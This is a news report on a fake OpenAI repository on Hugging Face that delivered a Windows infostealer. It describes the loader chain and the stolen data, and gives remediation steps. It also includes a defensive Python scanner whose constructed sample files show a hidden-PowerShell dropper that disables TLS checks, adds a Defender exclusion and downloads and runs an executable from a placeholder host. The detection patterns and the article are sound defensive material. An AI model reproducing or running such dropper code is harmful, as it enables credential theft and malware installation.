Fake OpenAI repository on Hugging Face pushes infostealer malware

Published: May 9, 2026 at 10:26 AM EDT

Source: Bleeping Computer

Overview

A malicious Hugging Face repository that reached the platform’s trending list impersonated OpenAI’s Privacy Filter project to deliver information‑stealing malware to Windows users. The repository briefly hit #1 on Hugging Face and accumulated 244,000 downloads before the platform responded to reports and removed it.

Researchers at HiddenLayer, a company focused on safeguarding AI and ML models against attacks, discovered the campaign on May 7 after noticing a repository named Open-OSS/privacy-filter.

“The repository had typosquatted OpenAI’s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a loader.py file that fetches and executes infostealer malware on Windows machines,” the researchers explain in their full report.

Malicious Repository Details

The loader.py script was padded with decoy AI-related code so that a casual reader would take it for a harmless model wrapper. In the background it:

  1. Disabled SSL certificate verification, so the download below succeeds even if the server presents an invalid certificate.
  2. Decoded a Base64-encoded URL pointing to an external resource (the encoding keeps the domain out of a plain-text search of the file).
  3. Fetched a JSON document from that URL and executed the PowerShell command it contained.

That PowerShell command runs in a hidden window and downloads a batch file (start.bat) that:

  • Elevates privileges.
  • Downloads the final payload (sefirah).
  • Adds the payload's path to Microsoft Defender's exclusions so it is never scanned.
  • Executes the payload.
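The loader and dropper behaviours listed above are easy to spot statically once you know the pattern, and a model repository has no legitimate reason to ship a runnable loader at all (weights in safetensors format need none). The scanner below is an added example, not HiddenLayer's or Hugging Face's tooling: it parses a repository's Python files with the ast module and greps its batch/PowerShell files for the indicators named above (TLS verification disabled, a Base64-encoded URL, a hidden PowerShell window, a Defender exclusion). The sample loader and batch file at the bottom are constructed for this example, with a placeholder example.invalid URL and placeholder paths; they are not the real repository's files.

```python
"""Static triage of loader-style scripts bundled with a model repository.
Added example, not HiddenLayer's or Hugging Face's tooling; the sample inputs
at the bottom are constructed for this example and hold no real indicators."""
import ast, base64, re

# Strings that belong in a dropper's command line, not in a model loader.
CMD_PATTERNS = {
    "powershell_invocation": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion\w*", re.I),
}
# Calls that hand control to a shell or to dynamically built code.
EXEC_SINKS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_call",
              "subprocess.check_output", "os.system", "os.popen", "exec", "eval"}
EXECUTION = {"exec_sink", "powershell_invocation"}
EVASION = {"ssl_verification_disabled", "base64_url", "hidden_window", "defender_exclusion"}

def dotted_name(node):
    """'ssl._create_unverified_context' for an attribute chain rooted at a Name, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def decode_b64_url(s):
    """The decoded URL if s is the Base64 of an http(s) URL, else None."""
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except Exception:  # not Base64, bad padding, non-ASCII input, or not UTF-8 once decoded
        return None
    return text if re.match(r"https?://", text) else None

def scan_python(source):
    """Return (label, line, detail) findings for one Python file."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign):
            # ssl._create_default_https_context = ssl._create_unverified_context
            if any(dotted_name(t) == "ssl._create_default_https_context" for t in node.targets):
                findings.append(("ssl_verification_disabled", node.lineno, "default HTTPS context replaced"))
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name == "ssl._create_unverified_context":
                findings.append(("ssl_verification_disabled", node.lineno, name))
            if name in EXEC_SINKS:
                findings.append(("exec_sink", node.lineno, name))
                # Join every string literal in the call so a list-form argv reads as one command line.
                cmdline = " ".join(n.value for n in ast.walk(node)
                                   if isinstance(n, ast.Constant) and isinstance(n.value, str))
                findings += [(label, node.lineno, cmdline)
                             for label, pat in CMD_PATTERNS.items() if pat.search(cmdline)]
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = decode_b64_url(node.value)
            if url:
                findings.append(("base64_url", node.lineno, url))
    return findings

def scan_text(text):
    """Line-oriented scan for batch / PowerShell droppers."""
    return [(label, lineno, line.strip()) for lineno, line in enumerate(text.splitlines(), 1)
            for label, pat in CMD_PATTERNS.items() if pat.search(line)]

def triage(files):
    """files: {name: content}. 'suspicious' when something runs a command and something
    hides it, disables TLS checks, excludes a path from Defender, or decodes a hidden URL."""
    report = {}
    for name, content in files.items():
        try:
            report[name] = scan_python(content) if name.endswith(".py") else scan_text(content)
        except SyntaxError:  # a .py that is not valid Python: fall back to the text scan
            report[name] = scan_text(content)
    labels = {f[0] for fs in report.values() for f in fs}
    verdict = "suspicious" if labels & EXECUTION and labels & EVASION else "clean"
    return {"verdict": verdict, "findings": report}

# --- Constructed samples; not the real repository's files (URL and paths are placeholders) ---
SAMPLE_B64 = base64.b64encode(b"https://example.invalid/config.json").decode()
SAMPLE_LOADER = f'''import base64, json, ssl, subprocess, urllib.request

class PrivacyFilter:                      # decoy "model" code
    def redact(self, text):
        return text.replace("@", "[at]")

ssl._create_default_https_context = ssl._create_unverified_context
cfg = json.loads(urllib.request.urlopen(base64.b64decode("{SAMPLE_B64}").decode()).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cfg["cmd"]])
'''
SAMPLE_BATCH = r'''@echo off
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%TEMP%\upd'"
powershell -WindowStyle Hidden -Command "Invoke-WebRequest https://example.invalid/p.exe -OutFile %TEMP%\upd\p.exe"
start "" /b %TEMP%\upd\p.exe
'''

if __name__ == "__main__":  # run the constructed samples through the scanner
    print(triage({"loader.py": SAMPLE_LOADER, "start.bat": SAMPLE_BATCH}))
```

The verdict deliberately requires two classes of indicator, execution plus evasion, because either alone appears in legitimate code (a test harness shells out; a notebook decodes Base64). Run it over the unpacked snapshot of any repository before executing anything from it, and treat a hit on loader.py as a reason to stop, not to investigate on the same machine.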

Image: instructions from the malicious repository (source: HiddenLayer)

Payload and Capabilities

The final payload is a Rust‑based infostealer that targets the following data:

  • Browser data from Chromium‑ and Gecko‑based browsers (cookies, saved passwords, encryption keys, browsing data, session tokens)
  • Discord tokens, local databases, and master keys
  • Cryptocurrency wallets and wallet browser extensions
  • SSH, FTP, and VPN credentials and configuration files (including FileZilla)
  • Sensitive local files and wallet seeds/keys
  • System information
  • Multi‑monitor screenshots

The stolen data is compressed and exfiltrated to a command‑and‑control server at recargapopular[.]com.

HiddenLayer highlights extensive anti‑analysis features, including checks for virtual machines, sandboxes, debuggers, and other analysis tools.

Distribution and Impact

  • Downloads: 244,000 (likely inflated).
  • Likes: 667 accounts liked the repository; most appear to be auto‑generated.
  • Related activity: Researchers uncovered additional repositories using the same malicious loader infrastructure and noted overlaps with an npm typosquatting campaign distributing the WinOS 4.0 implant.

Mitigation Recommendations

Anyone who ran loader.py (or anything else from the malicious repository) should treat the machine as fully compromised and:

  1. Reimage the affected machine rather than cleaning it in place; the dropper elevates privileges and adds a Defender exclusion, so nothing the host reports about itself can be trusted.
  2. Rotate every credential that was stored or cached on it (passwords, API keys, tokens), doing so from a known-clean device.
  3. Move funds to new cryptocurrency wallets created from new seed phrases; a seed or key that was ever on the infected disk must be considered stolen.
  4. Invalidate browser sessions and tokens, Discord included, because stolen cookies and session tokens let an attacker in without the password or MFA.
  5. If a forensic look is wanted before wiping, check for lingering malicious files, unexpected Defender exclusions and scheduled tasks so the incident can be scoped.

Historical Abuse of Hugging Face

Threat actors have previously abused Hugging Face to host malicious models, despite the platform’s security measures.
